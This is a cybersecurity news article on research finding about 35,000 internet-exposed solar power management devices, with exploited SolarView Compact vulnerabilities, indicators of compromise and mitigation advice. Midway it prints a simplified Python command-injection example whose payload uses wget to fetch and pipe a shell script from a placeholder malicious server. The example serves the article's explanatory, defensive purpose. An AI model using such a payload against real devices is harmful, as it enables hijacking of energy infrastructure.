35,000 Solar Power Systems Exposed to Cyber Threats via the Internet

In a wake-up call for the renewable energy sector, recent cybersecurity research has revealed that nearly 35,000 solar power management devices including inverters, data loggers, and gateways from 42 different vendors are openly accessible via the internet.

This exposure leaves critical infrastructure susceptible to cyberattacks and underlines persistent gaps in operational technology (OT) security for green energy systems.

How Solar Systems Are Exposed

Using the Shodan search engine, researchers from Vedere Labs mapped out the global landscape of solar power systems with internet-exposed administrative interfaces as of May 2025.

These devices are typically intended to be controlled only from internal networks; internet exposure occurs when users or installers enable port forwarding a practice that vendors explicitly discourage due to its security risks.

Key technical findings include:

• The top 10 vendors of exposed devices are not the market leaders by sales volume but still represent major international brands, particularly from Germany and China.
• Over 75% of exposed devices are located in Europe, with Germany and Greece each accounting for about 20% of the total.
• Product types most commonly found include SMA Sunny WebBox (33% of exposed devices), SolarView Compact, and others—some of which are discontinued products still deployed in the field.

Exposed network interfaces typically run web servers (HTTP/HTTPS) for remote configuration or monitoring.

These endpoints, if left unsecured or unpatched, become prime targets for automated bots and malicious attackers scanning the internet for vulnerable targets.

Vulnerabilities and Exploitation

The risks are not merely hypothetical. The research highlights several actively exploited vulnerabilities in SolarView Compact devices, notably:

• CVE-2022-29303 (command injection)
• CVE-2022-40881 (command injection)
• CVE-2023-23333 (command injection)
• CVE-2023-29919 (insecure permission)

Versions of SolarView Compact publicly exposed on the internet are alarmingly out of date: 60% run firmware v4.00-v4.04, 28% run v3.01-v3.12, and none have the latest v8.20 firmware. This leaves them highly susceptible to botnet recruitment, unauthorized remote control, or acting as pivots for attacks on adjacent enterprise or grid networks.

Real-world exploitation: In 2024, some 800 SolarView Compact units in Japan were hijacked and repurposed for bank account theft.

Since that incident, the number of units exposed online has climbed over 350%, suggesting that the lessons from previous breaches are not being widely implemented.

Attack Vectors and Indicators of Compromise

Attackers typically leverage exploits in the HTTP(S) management interfaces to inject malicious commands, add rogue users, or download malware payloads that turn these devices into bots or bridgeheads for lateral movement.

Indicators of compromise (IoCs) tracked by researchers include:

• Inbound web requests probing for /cgi-bin and /config endpoints.
• Use of known botnet IP addresses, including several associated with Tor exit nodes.
• Firmware modification logs indicating administrative actions not performed by authorized users.

A simplified example of a command injection exploit that targets such a vulnerability might look like this (Python pseudocode):

pythonimport requests

target_url = "http://device-ip/cgi-bin/config.cgi"
payload = "param=1; wget http://malicious-server/malware.sh | sh;"
response = requests.post(target_url, data=payload)
print(response.status_code)

This kind of exploit can allow an attacker to download and execute arbitrary code on the exposed device.

Mitigation and Recommendations

Security experts recommend:

1. Patch immediately: Update to the latest firmware, especially for devices with known vulnerabilities. Retire devices that cannot be updated.
2. Restrict access: Never expose management interfaces to the internet. If remote management is necessary, use VPNs and follow CISA/NIST guidelines for secure access.
3. Continuous monitoring: Employ network monitoring to detect unauthorized access and traffic patterns indicative of compromise.
4. Vendor guidance: Follow vendor-specific cybersecurity advisories and best practices, such as SMA’s recommendation to keep devices “behind the fence.”

For solar site operators and owners, these steps are now critical—not just for protecting individual assets, but for ensuring the resilience and reliability of the emerging green energy-powered grid.

The rapid proliferation of internet-connected solar energy systems has outpaced cybersecurity awareness and best practices.

Until proper network segmentation and patch management become standard, solar infrastructure will remain an attractive, high-impact target for cyber adversaries.

The current exposure of 35,000+ devices is a stark warning to the entire industry: secure by design must become a non-negotiable baseline.